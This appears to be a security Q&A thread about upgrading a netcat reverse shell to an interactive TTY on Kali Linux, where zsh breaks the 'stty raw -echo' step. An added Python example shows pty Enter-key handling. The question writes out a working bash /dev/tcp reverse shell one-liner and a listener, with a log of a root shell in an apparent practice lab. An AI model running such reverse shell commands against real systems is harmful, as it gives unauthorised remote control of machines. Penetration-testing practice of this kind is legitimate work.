1

I successfully got a reverse shell:

nc -lnvp 8000 # in Kali
/bin/bash -i >& /dev/tcp/192.168.6.1/8000 0>&1 # in the victim machine

I tried to upgrade it in the standard way:

python -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo
fg
export TERM=xterm

However, after running stty raw -echo and bringing the reverse shell back to the foreground with fg, the reverse shell doesn't work properly. When I press the ENTER button to attempt to run a command, it prints ^M. Since the ENTER button doesn't work, I can't run any commands and I can't use the shell.

I know the commands are correct, because it used to work, but after upgrading to the latest Kali Linux, it doesn't work anymore.

Full output of terminal session when trying to upgrade the shell:

┌──(user㉿kali)-[~/exercises/htb]
└─$ nc -lnvp 8000
listening on [any] 8000 ...
connect to [10.0.2.15] from (UNKNOWN) [172.17.0.2] 46138
root@9070f0e8043f:/# id 
id
uid=0(root) gid=0(root) groups=0(root)
root@9070f0e8043f:/# python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
root@9070f0e8043f:/# ^Z
zsh: suspended  nc -lnvp 8000
┌──(user㉿kali)-[~/exercises/htb]
└─$ stty raw -echo                                                         148 ⨯ 1 ⚙
┌──(user㉿kali)-[~/exercises/htb]
                                     └─$                                             fg                          
[1]  + continued  nc -lnvp 8000
                               export TERM=xterm^M^M
schroeder
user3207874

2 Answers

3

The reason why it doesn't work in Kali Linux is because the latest Kali uses the zsh shell by default, not bash. To get it to work, you just have to make sure you're using the bash shell.

To temporarily switch to a bash shell, run the following command in your terminal:

exec bash --login

You can confirm if you're using bash by running:

ps -p $$

In the terminal which uses bash, run the listener and run the commands to upgrade the shell:

python -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo
fg
export TERM=xterm

As long as you're using bash and not zsh, it will work.

user3207874
2

For zsh, change it to:

python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo; fg
enter
export TERM=xterm-256color

No need to downgrade your shell. :)

k3nundrum

Struggled for days with my reverse shell and finally found this answer, thanks! For everyone, what actually mattered for me was "stty raw -echo; fg". It MUST be on one line to prevent having the ^M after. Thx again! – thibon Sep 02 '22 at 13:58
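
An added example, not part of the original posts: it uses a local pty on Linux to show what the terminal line discipline does with the Enter key (a carriage return, CR) under different stty flags, which is where the ^M in the question comes from. The function names, the scenario labels and the third flag combination are assumptions made for illustration; the thread does not state which flags zsh leaves set.

```python
import os, pty, select, termios

IFLAG, LFLAG, CC = 0, 3, 6  # indexes into the list returned by tcgetattr()

def drain(fd, timeout=0.3):
    """Collect whatever becomes readable on fd within `timeout` seconds."""
    data = b""
    while select.select([fd], [], [], timeout)[0]:
        chunk = os.read(fd, 1024)
        if not chunk:
            break
        data += chunk
    return data

def type_line(icrnl, icanon, echo, keys=b"id\r"):
    """Type `keys` (Enter sends CR) into a fresh pty with the given flags.

    Returns (delivered, echoed): the bytes a program reading the terminal
    receives, and the bytes the line discipline echoes back to the screen.
    """
    master, slave = pty.openpty()
    try:
        attrs = termios.tcgetattr(slave)
        attrs[IFLAG] &= ~termios.ICRNL
        attrs[LFLAG] &= ~(termios.ICANON | termios.ECHO | termios.ECHOCTL)
        if icrnl:
            attrs[IFLAG] |= termios.ICRNL      # translate CR to NL on input
        if icanon:
            attrs[LFLAG] |= termios.ICANON     # hand input over line by line
        else:
            attrs[CC][termios.VMIN], attrs[CC][termios.VTIME] = 1, 0
        if echo:
            attrs[LFLAG] |= termios.ECHO | termios.ECHOCTL
        termios.tcsetattr(slave, termios.TCSANOW, attrs)
        os.write(master, keys)
        return drain(slave), drain(master)
    finally:
        os.close(master)
        os.close(slave)

# Constructed scenarios, not captured from the session in the question.
SCENARIOS = {
    "cooked (kernel default for a new pty)": (True, True, True),
    "raw, no echo (flags relevant to stty raw -echo)": (False, False, False),
    "assumed broken state: canonical + echo, ICRNL off": (False, True, True),
}

if __name__ == "__main__":
    for name, flags in SCENARIOS.items():
        delivered, echoed = type_line(*flags)
        print(f"{name}: delivered={delivered!r} echoed={echoed!r}")
```

In the third scenario the reader receives nothing and the screen shows ^M, because without ICRNL a CR never terminates the line in canonical mode. Running stty -a in the listener terminal shows whether icrnl, icanon and echo are in that state.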